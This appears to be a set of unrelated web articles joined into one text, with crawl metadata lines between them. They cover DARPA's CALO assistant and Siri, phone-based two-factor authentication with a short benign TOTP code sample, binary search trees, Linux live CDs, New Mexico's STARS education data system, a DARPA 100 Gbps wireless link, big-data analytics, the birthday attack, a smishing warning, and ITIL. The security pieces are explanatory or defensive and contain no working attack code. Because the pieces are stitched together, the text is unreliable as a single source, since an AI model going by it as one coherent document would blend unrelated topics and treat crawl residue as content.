Two years since its demise, the spectre of Microsoft's animated paperclip, Clippy , still haunts anyone hoping to develop a virtual assistant to help people get things done. Few have tried to push virtual assistants to the public since.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
But Clippy's unpopularity hasn't deterred the US Defense Advanced Research Projects Agency (DARPA) from spending an estimated $150 million on its own virtual helper.
And although intended to ease the US military's bureaucratic load, an artificially intelligent helper based on the project is heading the way of consumers later this year.
Begun in 2003 the CALO, for Cognitive Assistant that Learns and Organizes, project involved over 60 universities and research organisations and is the largest ever non-classified AI project. It ends this Friday and has produced a virtual assistant that can sort, prioritise, and summarise email; automatically schedule meetings; and prepare briefing notes before them.
That focus could make the crucial difference between CALO being an annoyance like Clippy, and a genuinely useful helper.
Most software capable of learning needs large numbers of examples for something to stick – a spam filter trained on millions of emails, for example. But CALO needs to be quicker on the uptake. If it takes thousands of examples to learn how someone likes their email sorted, frustrated users will soon switch it off.
So the developers have built in tricks such as "transfer learning", which applies lessons from one domain to another. For example, if a person consistently marks emails from one person, perhaps their boss, as high-priority, CALO can use that knowledge to order their meeting schedule too.
A spin-off of DARPA's project, an app called Siri, will be coming to Apple's iPhone later this year. Siri has been designed to assist with mundane tasks, such as checking online reviews to find a good local restaurant and booking a table.
Rather than having to personally trawl through multiple websites to find a likely eatery, get the contact details and address, and make a reservation, the user can verbally instruct Siri to, say, "find me a romantic Thai restaurant in this area".
Siri uses navigates the various web services for the user, even booking restaurants and taxis through web forms where possible. The person it is helping can also book cinema tickets, and search for flights or weather forecasts without typing a word.
Another CALO spinoff is Social Kinetics, a social-network analysis package that helps people organise their contacts by criteria that can include relationship and expertise.
The system is already being used by the military to track how information flows through the ranks, identify experts, and generate a repertoire of answers to standard questions.
The consumer version focuses on healthcare, connecting people to the experts and information they need to make decisions about their health and treatment.
Bart Selman, an AI researcher at Cornell University who is not involved with the CALO projects, says that virtual assistants are not yet comparable to human help. "It's safe to say that the system does not yet perform at the level of a dedicated personal assistant," he told New Scientist.
But, he continues, in most organisations, human helpers are a luxury most people do not have. In these situations, automated, dedicated, and personalised assistants could be helpful – as long as they don't bug the hell out of their users.
This article originally appeared on New Scientist. | <urn:uuid:f46b0c8a-31dc-4305-9580-da3f1f70fbef> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/1280096980/DARPA-designs-a-new-Clippy-virtual-assistant-military-style | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284376.37/warc/CC-MAIN-20170116095124-00084-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949858 | 719 | 2.609375 | 3 |
Here's a polarizing question: is a phone a second factor, in the context of two-factor authentication? Fellow infosec pro @johnnysunshine tweeted the above last week, and sparked a lively debate.
Before answering the question, let's back up a bit and explain two-factor authentication (or 2FA). To borrow an analogy I first used two years ago: 10,000 years ago, Grog and Mag formed a secret club. To ensure new members of the club would be accepted, they came up with a secret phrase. Thus was born the first password. One day Narg overheard two members greeting one another and learned the secret phrase. Thus occurred the first password breach.
Passwords can be stolen though, whether through a server database breach, or via a phishing scam, or by keylogging malware that captures the password as you enter it into a webpage. If a password is the only thing protecting your account, then a stolen password lets an attacker pretend to be you. If the attacker knows the right password, the server or website has no way of knowing it's an impostor.
By adding a second factor - something you physically possess (an identification card, or a token generator, or - the crux of today's question - a phone), the bar for an attacker is raised. Individually, each factor might be relatively easy to defeat. Gaining access to both a password and a device at the same time though takes more effort, and is far less likely. Not impossible, but less likely.
About that phone...
Two-factor means you as the user have to have a second thing with you to serve as the second factor. Some services offer a physically unique device to serve as the second factor - often something along the lines of an "RSA Token" - a small device about the size of a USB flash drive that displays a number, which changes every minute or so. Less common is a token the size and shape of a credit card that does the same.
But think about the number of important accounts you have: banks, credit card accounts, email accounts, social media accounts. Carrying one "second factor" around might not be a nuisance, but carrying a dozen around becomes impractical in a hurry. What is something almost everyone has though, and has with them at almost all times?
A cell phone.
Service providers caught on to this a few years ago and began implementing a form of two-factor authentication in which the provider sends an SMS text message containing a code, typically six digits, to enter along with your password. Similar to a physical code generator, the SMS code is only useful for about a minute before it changes to something else.
More recently, companies including Google, game maker Blizzard, and security provider Duo have produced Android and iOS authenticator apps that emulate the function of a code generator. Functionally though, they behave the same: they give a one-time-use token that is good for about a minute, and must be used along with the password in order to log into an account.
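Under the hood, most of these authenticator apps implement the TOTP standard (RFC 6238). Here is a minimal, self-contained sketch of how such a code is derived from a shared secret and the current time; the secret below is a made-up example, and real apps add enrollment, clock-drift tolerance and rate limiting.

import base64, hashlib, hmac, struct, time

def totp(secret_b32, step=30, digits=6):
    # Time-based one-time password per RFC 6238 (HMAC-SHA1 variant).
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int(time.time()) // step           # advances every `step` seconds
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                   # dynamic truncation (RFC 4226)
    number = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(number % 10 ** digits).zfill(digits)

# Hypothetical shared secret, as exchanged when the account is enrolled.
print(totp("JBSWY3DPEHPK3PXP"))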
So what's the big deal?
Well, as Twitter alias @munin implies, phone malware and malicious actors. The story that kicked off this discussion described a sophisticated new mobile malware scheme currently targeting customers of 20 banks in Australia, New Zealand and Turkey. The initial bait was a popup message indicating that a particular website required installing "Flash Player" - but the install link was fake. Once installed, the malicious fake Flash Player would silently scan the phone for the mobile apps of targeted banks and download additional payloads for each app found.
To defeat two-factor authentication, the malware can forward SMS communication to the attacker. It can also delete SMS communication from the phone itself, enabling the attacker to generate and intercept future 2FA tokens without the user being aware. Security firm ESET has all the gory details in their analysis of the malware.
So, phones aren't suitable for two-factor authentication?
If you ask 10 security experts that question, you'll get 12 answers. There are many experts whose opinions I respect who will disagree with me - and that's OK. Read the discussion that follows the original tweet and you will see a variety of well-informed opinions on both sides. Cyber security is a complicated field, fraught with threats and exploits.
But Security For Real People exists to give reasonable advice for reasonable security. Saying mobile two-factor authentication is too risky to use is no help to you - because what is your alternative? Two-factor authentication using a phone is convenient for you, it is widely available, and it raises the bar for an attacker significantly. Can it be defeated? Sure. But using a password alone is far more likely to result in a compromised account.
Bottom line? For accounts that you would be seriously unhappy to have broken into, if the provider offers two-factor authentication using your cell phone, by all means take advantage of it.
This article is published as part of the IDG Contributor Network.
Definition: A binary tree where every node's left subtree has keys less than the node's key, and every right subtree has keys greater than the node's key.
Generalization (I am a kind of ...)
binary tree, search tree.
Specialization (... is a kind of me.)
AVL tree, splay tree, threaded tree, randomized binary search tree, discrete interval encoding tree.
Aggregate parent (I am a part of or used in ...)
See also relaxed balance, ternary search tree, move-to-root heuristic, jump list.
Note: A binary search tree is almost always implemented with pointers, but may have a variety of constraints on how it is composed.
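For illustration, a minimal pointer-based sketch in Python (not part of the original dictionary entry); insert and search follow directly from the definition above, and duplicate keys are ignored.

class Node:
    def __init__(self, key):
        self.key, self.left, self.right = key, None, None

def insert(root, key):
    # Keep the invariant: smaller keys go left, larger keys go right.
    if root is None:
        return Node(key)
    if key < root.key:
        root.left = insert(root.left, key)
    elif key > root.key:
        root.right = insert(root.right, key)
    return root

def search(root, key):
    while root is not None and root.key != key:
        root = root.left if key < root.key else root.right
    return root

root = None
for k in [8, 3, 10, 1, 6]:
    root = insert(root, k)
print(search(root, 6) is not None)   # True
print(search(root, 7) is not None)   # False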
An animation (Java).
If you have suggestions, corrections, or comments, please get in touch with Paul Black.
Entry modified 26 January 2015.
Cite this as:
Paul E. Black, "binary search tree", in Dictionary of Algorithms and Data Structures [online], Vreda Pieterse and Paul E. Black, eds. 26 January 2015. (accessed TODAY) Available from: http://www.nist.gov/dads/HTML/binarySearchTree.html | <urn:uuid:d6bc40ce-4444-4b63-b2ed-b656893b0397> | CC-MAIN-2017-04 | http://www.darkridge.com/~jpr5/mirror/dads/HTML/binarySearchTree.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280723.5/warc/CC-MAIN-20170116095120-00296-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.879651 | 273 | 2.9375 | 3 |
The main shortcoming of these distributions is that they integrate into the Windows desktop, rather than presenting a GNU/Linux one. They do not, for instance, give users the opportunity to use multiple workspaces, or to try desktop customization options. But, since each installs, runs, and uninstalls as though it were another Windows program, most people should have little trouble using it.
A live CD or DVD is one that you can use to start your computer. Live CDs became popular in GNU/Linux in 2003 with the release of Knoppix, although they existed before then.
Today, almost every distribution includes Live CD versions on their download pages, especially user-friendly ones like Ubuntu or Fedora. To use one, you must download the CD or DVD image file (both of which have an .iso extension), then create a disk from the file. Your burning software will have an option for working with an image file that is separate from the one for creating a data disk.
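Before burning, it is worth verifying the downloaded image against the checksum published on the distribution's download page, since a corrupted ISO is a common cause of mysterious boot failures. A minimal sketch, in which the file name and published hash are placeholders:

import hashlib

def sha256_of(path, chunk_size=1 << 20):
    # Hash the ISO in chunks so a multi-gigabyte image fits in memory.
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()

published = "0123abcd..."  # placeholder: copy the hash from the download page
print(sha256_of("distro-live.iso") == published)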
When you have burned the disk, place it in the drive and restart your computer. You may need to change the boot order so that the machine boots from the CD/DVD drive instead of the hard disk. Depending on your machine, this change is made by pressing a key or sequence of keys as the computer starts, either in a separate boot menu or in the BIOS; watch the screen during startup for a message telling you which keys to press.
Most Live CDs will boot to a GNU/Linux desktop. Some, however, stop at the login screen and require that you enter a user name and password before you reach the desktop. You can find the user name and password you need on the download page from which you got the image file.
The main advantage of a live CD is that you can boot into GNU/Linux without making any changes to your system. While you can access your hard drive from a live disk, you have to make a deliberate effort to do so, and most basic users will have no idea how to make that effort.
A live CD is also useful as a recovery disk. If you want secure computing, or the ability to carry a familiar operating system for use in whatever computer you happen across, you can use a live CD with a flashdrive on which to save your files.
The disadvantage of live disks is that they are slow compared to a hard drive. Used on a laptop, which is generally slower than a workstation, they can be painfully slow. The first time you start a computer with one, you may wonder whether it has stalled, and once you reach the desktop, programs will start slowly. The impression that new users might get is that GNU/Linux is much slower than Windows, when usually the opposite is true.
You cannot do much about this lack of speed. However, you can minimize it by choosing a distribution designed for older computers, such as Damn Small Linux, or one optimized for speed, like NimbleX and many other Slackware-based distributions.
Live USB drives are similar to a Live CD/DVD. Typically, though, Live USB drives are not on the download pages of your distribution of choice. Instead, they are usually developed by a sub-project that you can find by a quick Web search.
Live USB drives have all the advantages of a Live CD, and none of the disadvantages. Although slower than a hard drive, Live USB drives are much faster than a Live CD, and can hold much more information. Many, too, are persistent -- that is, you can store files and make permanent changes to the desktop, neither of which you can do from a Live CD. All of which means that a test drive using a Live USB is far closer to the experience of using GNU/Linux on a workstation.
However, in many cases, you need a machine with GNU/Linux installed to create the Live USB drive. A notable exception is Fedora's LiveUSB-Creator, a script that runs a wizard in Windows XP or Vista to step you through the creation of the live flashdrive. | <urn:uuid:23b19f66-5875-4c07-bee7-9fac5d6c07c0> | CC-MAIN-2017-04 | http://www.datamation.com/osrc/article.php/12068_3755906_2/Five-Ways-for-Windows-Users-to-Test-Drive-GNULinux.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00112-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950208 | 854 | 2.625 | 3 |
A focal point requirement of the 2002 No Child Left Behind Act (NCLB), federal legislation aimed at improving U.S. primary and secondary schools performance, was to implement accountability systems that analyze student and educator data, and report those results to the U.S. Department of Education. These reporting systems were heralded as an effective way to help state departments of education collect statistics to assess teacher proficiency and student progress.
"It's really important to be able to follow individual students from grade to grade, school to school, district to district and see how they are doing over time," said Jim Hull, a policy analyst at the National School Boards Association (NSBA). "We haven't been able to do that before."
In addition, educational data systems offer the advantage of getting assessment data back to educators faster than before. "You had the old-fashioned assessment test that's taken in April and no one gets results until October or November. It's not a useful timeframe; those kids have moved on," said Ann Flynn, director of education technology programs at the NSBA.
While there is little doubt that collecting more specific data - and publishing the results more quickly - is beneficial to educators, many states have struggled with how to best implement data systems. Limited funding, institutional resistance to change, and schools' use of various student information systems have been impediments.
New Mexico officials, however, believe they have solved some of those issues with the state's Student Teacher Accountability Reporting System (STARS).
Longitudinal Student Data
STARS is a statewide, "longitudinal" educational information system that collects data from students through all grade levels, starting in kindergarten and continuing through the 12th grade. Although NCLB doesn't require longitudinal systems, states such as Florida have shown that having that kind of long-term data can be a useful measurement when assessing how well a school, district or state is meeting educational benchmarks for schools and individual students. Florida has been electronically collecting its longitudinal student data since the 1980s, allowing the state to make decisions based on comprehensive, accurate and timely data about its schools.
The STARS system collects and aggregates a variety of student data: demographics and achievement information, exam scores on state- and federally mandated tests, districts' financial information, and teacher licensing data. "At a minimum, the system collects information on students, teachers, staff, programs and schools," said Philip Benowitz of Deloitte Consulting, the engagement director for the STARS project. "But there's no limit to what the system could collect. We're still in the early stages of understanding what makes sense and what's really valuable."
Moreover, the system standardizes data so it can be reported to the federal government as required by NCLB.
But Benowitz asserts that STARS has more value than just for NCLB compliance. New Mexico can provide data to the school districts for their own analyses and use. "The intent and the spirit is to put the data in the hands of educators and analysts who can make a difference in student achievement - the classroom teacher, the principal, the state educational analyst," he said. "People who can help to improve the curriculum and student achievement."
Overcoming Interoperability Issues
New Mexico CIO Roy Soto said it was a challenge to determine the best way to collect and consolidate data. "New Mexico is no different from any other state. We have 89 school districts, all collecting data in a different form and fashion."
Unlike many other states, New Mexico had been collecting student-level data since 1997 with the STARS predecessor, the Accountability Data System (ADS). But ADS had maintenance and system integrity issues. Before making critical implementation decisions on a new system, the state conducted several legislative audits. After careful consideration of the results, the state chose a data warehouse solution and put out an RFP to find a vendor.
"We basically took the audits, with specific emphasis on what needed to be fixed, and put it into our request for proposal," said Robert Piro, CIO of the New Mexico Public Education Department (PED). "Deloitte Consulting presented us with a solution based on eScholar and Cognos."
With eScholar, an educational data collection and analysis tool, and Cognos business intelligence software, Deloitte created a commercial-off-the-shelf system that allows school districts to collect data as they've always done.
"In New Mexico, there are a dozen or more student information system vendors that have systems in place in one or more of the 89 school districts. The last thing we wanted to do is mandate that they all use the same system," Benowitz said. With the STARS solution, school districts can continue using their existing systems and produce a flat extract data file that can be uploaded to the data warehouse automatically.
New Mexico implemented the system in nine months. "We started the prototype in December of 2005, and then did a pilot with 11 districts in spring 2006," Piro said. "We're now in our second year of data collection."
One of New Mexico's biggest hurdles was change management. Since the system was implemented in less than one year, there was pushback at the district level from some educators.
"When you have so many different entities that are basically independent, doing things a certain way, it's hard," Soto said. "Some people saw it as, 'Here comes Big Brother.'"
Although school districts could keep their internal systems, the move to STARS required a redefinition of processes for what kind of data to collect and when to collect it. This caused some consternation from districts that already had workflows in place.
Daryl Landavazo, New Mexico's STARS IT project manager, said the districts have been collecting student-level data for some time. "So the assumption was, 'We're using data; we know how to report, and we know what we're collecting,'" he said. "But that's not always the case."
To combat resistance, the STARS team marketed a proof-of-concept system to both the school districts and the Legislature. "We showed them the proof of concept, and said, | <urn:uuid:c1ac63d4-7445-455d-a8f7-168434bd0dc3> | CC-MAIN-2017-04 | http://www.govtech.com/education/Student-Tracking-System-Helps-New-Mexico.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00232-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964404 | 1,265 | 3.203125 | 3 |
The U.S. military is developing wireless networking technology roughly 400 times faster than what's currently used to communicate between aircraft and the ground in war zones. The Defense Advanced Research Projects Agency (DARPA) announced on Dec. 14 development of a wireless common data link (CDL) capable of transmitting data at 100 Gbps, according to a press release. According to ExtremeTech, current U.S. military CDL technology typically reaches a maximum of 250 Mbps.
The wireless backbone is intended to replace traditional fiber broadband networks in areas where war makes such technologies impractical to deploy. The exact goal of the project will be to create a 100 Gbps data link between an aircraft 60,000 feet in the air and the ground. One major challenge in creating such a high-bandwidth, low-latency wireless technology is cloud cover.
“The system will be designed to provide all-weather capability enabling tactically relevant data throughput and link ranges through clouds, fog or rain. Technical advances in modulation of millimeter-wave frequencies open the door to achieving 100G’s goals,” a DARPA press release reads.
One of the really hard things about having Big Data is figuring out what to do with it. There are obvious questions that can be asked, such as “what’s the correlation between demographics and purchasing choices,” but when it comes to complex inductive reasoning you need expertise, and thus we’ve seen the rise of a new analytics role: Data scientist.
Data scientists were recently the topic of a Harvard Business Review article, Data Scientist: The Sexiest Job of the 21st Century (paywalled), but there's a problem with this profession: There aren't enough of them. And no matter how many data scientists universities produce in the next few years, there still won't be enough.
The answer is, of course, to set a computer onto the task of analyzing and deriving insights and conclusions. Unfortunately, most of the available solutions are complex to use and require that you ask just the right question in some sort of computer language. Enterra Solutions, a key competitor in the big data analytics market, has a solution that is completely different in that it can automatically mine data exhaustively and intelligently to draw conclusions based on natural language queries.
Enterra Solutions can ingest huge amounts of data and using natural language processing transform it into knowledge using a generalized ontology to discover the meanings of words in context along with the implicit rules and relationships as used by humans.
Then, when a question is asked in more or less natural language, the database of knowledge is accessed by Enterra's Hypothesis Engine. The Hypothesis Engine is an artificial intelligence system that applies common-sense and domain-specific ontologies to further structure the knowledge. Next, using Enterra's Rules-Based Inference System, it can start from an objective and find the facts that support it (backward chaining), or start from facts and derive objectives (forward chaining), depending on the knowledge found and its significance.
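As a toy illustration of forward chaining (not Enterra's actual engine), the sketch below repeatedly applies if-then rules to a set of known facts until nothing new can be derived. The rules and facts are invented, echoing the grocery example that follows; a production system adds weights, conflict resolution and ontology-aware matching.

# Toy forward-chaining inference: fire rules until no new facts emerge.
rules = [
    ({"bought_bbq_sauce", "bought_beef"}, "grilling_household"),
    ({"grilling_household", "summer_season"}, "promote_cumin_flavorings"),
]

facts = {"bought_bbq_sauce", "bought_beef", "summer_season"}

changed = True
while changed:
    changed = False
    for conditions, conclusion in rules:
        if conditions <= facts and conclusion not in facts:
            facts.add(conclusion)   # the rule fires, adding a derived fact
            changed = True

print("promote_cumin_flavorings" in facts)   # True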
Other engines in the system weigh results, formulate database queries, and analyze assets and all of these components pass data back and forth between themselves based on rules and inferences to derive conclusions.
As an example, a grocery chain might ask “Find what drives an uplift in sales for Cumin food flavorings in PA and map the results.” The already-ingested, now-structured data is passed to the Hypothesis Engine, which produces a map of Pennsylvania showing the result of that query: Enterra concluded the uplift is due to increased sales of barbecue sauces in conjunction with purchases of beef, chicken, and pork. The resulting map plots the locations and the individual lifts in sales and spending for each protein in each store. Armed with this data, a marketing group could create individual promotions based on the most popular proteins and sauce for each store.
Enterra’s solution is being used by several major corporations including McCormick & Company, Inc., the 150-year-old spice and ingredients company. McCormick has developed Flavorprint, a service they describe as "the food equivalent of Pandora’s Music Genome Project." Flavorprint offers recipes as well as spice and flavoring suggestions based on your culinary preferences, and Enterra is a key component of the Big Data analytics that drives the service.
Artificial intelligence driven analytics will have a big impact not only in sales and marketing but also in healthcare (particularly epidemiology), education, farming, and supply chain management. Moreover as platform performance increases due to improved storage and processor performance you’ll see this type of analytics being done in real-time.
The application of artificial intelligence to Big Data analytics is one of the hottest areas in data science, and its ability to make up for the shortfall of human data scientists (which is likely to be a long-term problem) means Enterra Solutions has a very rosy future.
The birthday attack is a statistical phenomenon relevant to information security that makes the brute forcing of one-way hashes easier. It's based on the birthday paradox, which states that in order for there to be a 50% chance that someone in a given room shares your birthday, you need 253 people in the room.
If, however, you are looking for a greater than 50% chance that any two people in the room have the same birthday, you only need 23 people.
This works because the matches are based on pairs. If I choose myself as one side of the pair, then I need a full 253 people to get to the magic number of 253 pairs. In other words, it’s me combined with 253 other people to make up all 253 sets.
But if I am only concerned with matches and not necessarily someone matching me, then we only need 23 people in the room. Why? Because it only takes 23 people to form 253 pairs when cross-matched with each other.
So the number 253 doesn’t change. That’s still the number of pairs required to reach a 50% chance of a birthday match within the room. The only question is whether each person is able to link with every other person. If so you only need 23 people; if not, and you’re comparing only to a single birthday, you need 253 people.
This applies to finding collisions in hashing algorithms: it is much harder to find an input that collides with one given hash (like matching a specific birthday) than it is to find any two inputs that hash to the same value (like any two people sharing a birthday).
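The arithmetic is easy to check, and the effect is easy to demonstrate on a hash truncated to 32 bits: matching a fixed digest takes on the order of 2^32 tries, while an any-pair collision shows up after roughly 2^16 (about 65,000) random inputs. The truncation below exists only to make the demo finish quickly; it is not an attack on SHA-256 itself.

from math import comb
import hashlib, os

print(comb(23, 2))    # 253 pairs from just 23 people

def h32(data):
    # A 32-bit hash: the first 4 bytes of SHA-256, for demo speed only.
    return hashlib.sha256(data).digest()[:4]

seen = {}
tries = 0
while True:
    msg = os.urandom(8)
    tries += 1
    digest = h32(msg)
    if digest in seen and seen[digest] != msg:
        print("collision after", tries, "tries")   # typically tens of thousands
        break
    seen[digest] = msg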
[ Updated: August 2008 ] | <urn:uuid:3fd76b35-8ad6-4358-92ef-9a86e9d855ca> | CC-MAIN-2017-04 | https://danielmiessler.com/study/birthday_attack/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00378-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938161 | 331 | 3.09375 | 3 |
The FBI's Internet Crime Complaint Center (IC3) recently published a warning about Smishing and Vishing. These mobile phone threats are variations of phishing, but smishing uses SMS texts to initiate the scam, while vishing uses automated phone calls.
These threats are new variations on an old and costly methodology of identity theft. The problem here is that mobile users who are novices with regard to computer security threats are simply unaware they are in jeopardy when they respond to text and audio phishing on their mobiles.
Meanwhile, sophisticated corporate IT users who should know better are compromised via their mobile phones just the same.
Just to backup a step, SMS stands for short message service. SMS is also often referred to as texting, sending text messages or text messaging. The service allows for short text messages to be sent from one cell phone to another cell phone or from the Web to another cell phone.
Just because the SMS service runs on a phone does not make it impervious to computer phishing.
The particularly nasty form of SMS spam called smishing is the act of phishing by SMS for private information, often to be used for identity theft. These smishing attempts take the form of text messages and voice messages that come to your phone saying things like "We're confirming your parcel delivery," "Your account status has been changed" or "ABC credit card is confirming your purchase."
The user is given a phone number to call or a website to log onto to provide account credentials to remedy the issue. Or the victim is directed to a spoofed web site. A spoofed web site is a fake site that misleads the victim into providing personal information, which is in turn routed to the scammer's computer.
If a victim attempts to telephone the inbound number of a phishing call, they will most probably encounter no voice mail or a constantly busy signal. This is because attackers call from throw-away phones, rendering the calls virtually untraceable.
The FBI report said a recent smishing scam was used to steal money from customers of a credit union. After receiving a text about an account problem, victims called the number provided and gave out their personal information. Within 10 minutes money was withdrawn from their bank accounts. The same technique was also recently used to attack banking customers who were told via text that they needed to reactivate their ATM cards at a bogus web site.
What to do. What not to do.
Once again, here are some simple, time-tested steps to avoid being a victim of identity theft and fraud:
• Do not respond to text messages or automated voice messages from unknown or blocked numbers.
• Do not respond to unsolicited (spam) email.
• Do not click on links contained within an unsolicited email.
• Be cautious of email claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders. Avoid filling out forms contained in email messages that ask for personal information.
• Do compare the link in the email with the link to which you are actually directed, and see for yourself whether it is the legitimate URL. Better still, just log directly onto the official web site for the business identified in the email. If the email appears to be from your bank, credit card issuer, or other company you deal with frequently, your statements or official correspondence from the business will provide the proper contact information.
• Do contact the actual business that supposedly sent the email to verify if the email is genuine.
• Do verify any requests for personal information from any business or financial institution by contacting them using the main contact information.
Have a secure week. Ron Lepofsky CISSP, CISM www.ere-security.ca | <urn:uuid:7d56b1b1-12d8-412a-81b4-bfa2e5bfe2c7> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2227870/access-control/what-s-your-pain-threshold-for-mobile-phone-identity-theft-.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281001.53/warc/CC-MAIN-20170116095121-00315-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938564 | 771 | 2.71875 | 3 |
The basics of ITIL and why ITIL certification is taking over the world
ITIL, The Information Technology Infrastructure Library, is part of a suite of best-practice publications that explain the IT Service Management Framework (ITSM) — how to deliver and manage IT services in an organization in a way that best meets the expectations of the business and the customer.
ITIL stresses “Best Practice” in delivering IT services. “Best Practice” is a technique or methodology that, through experience and research, has proven to consistently and reliably lead to a desired result — hence its use as a benchmark. ITIL checks all the boxes when it comes to ITSM, with more than 25 years of extensive investment in understanding and improving on the best methods, processes and ideas for the delivery of IT services.
Originally developed in the late 1980s, ITIL was an initiative of the government of the United Kingdom. The Central Computing and Telecommunications Agency (CCTA) — since renamed Office of Government Commerce (OGC) — was tasked with investigating how the government could address the lack of quality in procured IT services, as well as manage associated costs.
Four iterations later, the current version of ITIL (2011) was born. In 2013, OGC went into partnership with Capita plc to form AXELOS, a joint venture to market and manage the best practice portfolio on behalf of OGC.
The ITIL framework provides guidance on IT service delivery based on five stages of the service lifecycle, set forth in five core publications:
● ITIL Service Strategy
● ITIL Service Design
● ITIL Service Transition
● ITIL Service Operation
● ITIL Continual Service Improvement
Under these lifecycle stages, ITIL describes 26 processes and four functions which go into detail about how IT service providers can deliver and manage IT services with regard to purpose, objectives, value to business, policies and principles, activities, triggers, inputs and outputs, challenges, risks, roles and responsibilities.
ITIL is the world’s most widely used ITSM framework. It provides guidance to service providers on the provision of quality IT services, and on the processes, functions and other capabilities needed to support them.
Practitioners utilize the techniques, processes and functions described in ITIL publications to discover and implement the best ways to organize IT structures and deliver IT services. Utilizing ITIL’s best-practices enables an entity to reap the benefits of high-service availability and performance, improved customer satisfaction, better cost management and faster time to deliver new services.
Benefits of ITIL
ITIL’s main takeaway is that IT service providers should view their offerings from a customer or user’s perspective. They should always ask how these services can best be delivered to meet customer and user requirements in order to achieve their desired outcomes. There are many benefits to utilizing ITIL. The more prominent ones include:
● Alignment of IT with the current and future business needs
● Ability to negotiate realistic service levels at acceptable costs
● Ability to develop predictable and consistent processes
● Ability to achieve greater efficiency via well-defined processes and documented accountability
● Ability to measure and track the improvement of services and processes
● Ability to develop, maintain and share a common language of terms
ITIL’s “adopt and adapt” policy means that the best practices described can be contextualized to any organization based on its size, needs and capabilities. A company shouldn’t be seeking to implement ITIL for what it is, but rather implement ITSM using ITIL guidance in a manner that meets their needs and desired outcomes.
Thousands of companies of all sizes, and across all industries, currently utilize ITIL. These companies include technology firms, retail giants, entertainment conglomerates, financial services firms, and manufacturers. As a framework, ITIL is easily adaptable to any organization as way to help it achieve desired outcomes.
ITIL training and certification qualifies individuals working for IT service providers to understand best-practices for strategizing, designing, transitioning, operating, and improving IT services that meet the needs of their organizations, users and customers. It also trains IT personnel to understand the need to work together to achieve business outcomes, by enabling business change, managing risk and optimizing customer experience.
An IT department that understands ITIL speaks a common language, understands interdependencies between teams and builds trust in the organization leading to higher probability of meeting goals and objectives.
ITIL training is structured in five certification levels:
Foundation — This is the entry level. It qualifies practitioners in the basics of ITIL elements, concepts, and terminology.
Practitioner — This newly available (as of this week) qualification is designed to improve an individual’s ability to implement ITIL in their organizations.
Intermediate — This level is divided into two modules: Lifecycle and Capability. Each module has a different focus on ITSM and goes more in depth into ITIL aspects.
Expert — This qualification crosses the entire ITIL lifecycle. Credentialed individuals possess “well-rounded, superior knowledge and skills base in ITIL Best practices.”
Master — This level is for individuals who have at least five years of experience in ITSM in leadership or managerial roles. Certification validates an individual’s ability, based on the real-life experiences, to implement all ITIL concepts in an organization.
ITIL-related jobs and careers
As more companies of all sizes adopt and implement ITIL, job opportunities for certified individuals will continue to increase — as will salaries. Almost every job in today's IT world demands some knowledge of ITIL at the Foundation level, because it helps in the communication and understanding of IT processes.
Available jobs for ITIL-certified individuals include just about every IT service delivery position including: Service Desk and Change Management Analysts, System Administrators, Project Managers, Testers, Technical Support Analysts, Service and Business Relationship Managers, ITIL Process Managers, and CIOs. Apart from these roles, ITIL certification can also lead to other opportunities in IT Service Management training and consultancy.
ITIL-certified professional’s typical work day
The single point of contact between providers and users of IT services is the Service Desk. A typical day for a Service Desk Analyst involves handling issues and requests raised by IT users.
ITIL certified professionals will most often be found designing, implementing and operating IT services. Typically they will deal with incidents and disasters as they arise while serving on project teams for new or changed services, or operations teams monitoring services.
Service or Process Managers are generally involved in analysing and reporting on the performance of the IT services or ITIL processes under their domain, while Business Relationship Managers regularly liaise with customers to check whether they are satisfied with IT services and relay that feedback to IT personnel.
More popular outside the United States than inside
There continues to be significant growth in the uptake of ITIL worldwide. Thousands of multi-national organizations are utilizing ITIL including NASA, The Walt Disney Company, UNOPS, the Port of Rotterdam, HP, Microsoft, Proctor & Gamble, and the Australian national government, to name a few.
ITIL is currently more popular outside United States for one simple reason: It originated in the United Kingdom, and has since mostly been adopted by the English-speaking world where, not surprisingly, most U.K. companies have established subsidiaries.
A 2008 survey conducted by Dimension Data asked CIOs to give reasons for not implementing ITIL. The main barriers to wide-scale implementation were twofold: costs in time and money for training and certification, and the limited numbers of ITIL implementers. This seems to indicate that companies who want to follow global standards would most likely implement ITIL by the book. Stand-alone companies, or those working in a dynamic sector, want flexibility and will not look at ITIL because they view it more as instructional rather than as a business framework.
While ITIL hasn’t been as strongly advocated in the United States, implementation is increasing. Although U.S. companies sometimes will not directly say they’ve adopted ITIL word-for-word, investigations show that some of ITIL’s best-practice elements are being regularly implemented on a piecemeal basis. Amazon and eBay, for example, have both pursued this “adopt and adapt” approach.
A quick internet search reveals that an increasing number of American universities and private companies have implemented ITIL, as well as the U.S. Army, Navy and the Internal Revenue Service. It is anticipated that, over time, more U.S. companies will realize the benefits of adopting ITIL for their operations.
ITIL = Work smarter, not harder
ITIL is an internationally recognized set of ITSM best practices, guidelines applicable and adaptable for any organization’s ITSM delivery in a way that best meets business and customer needs.
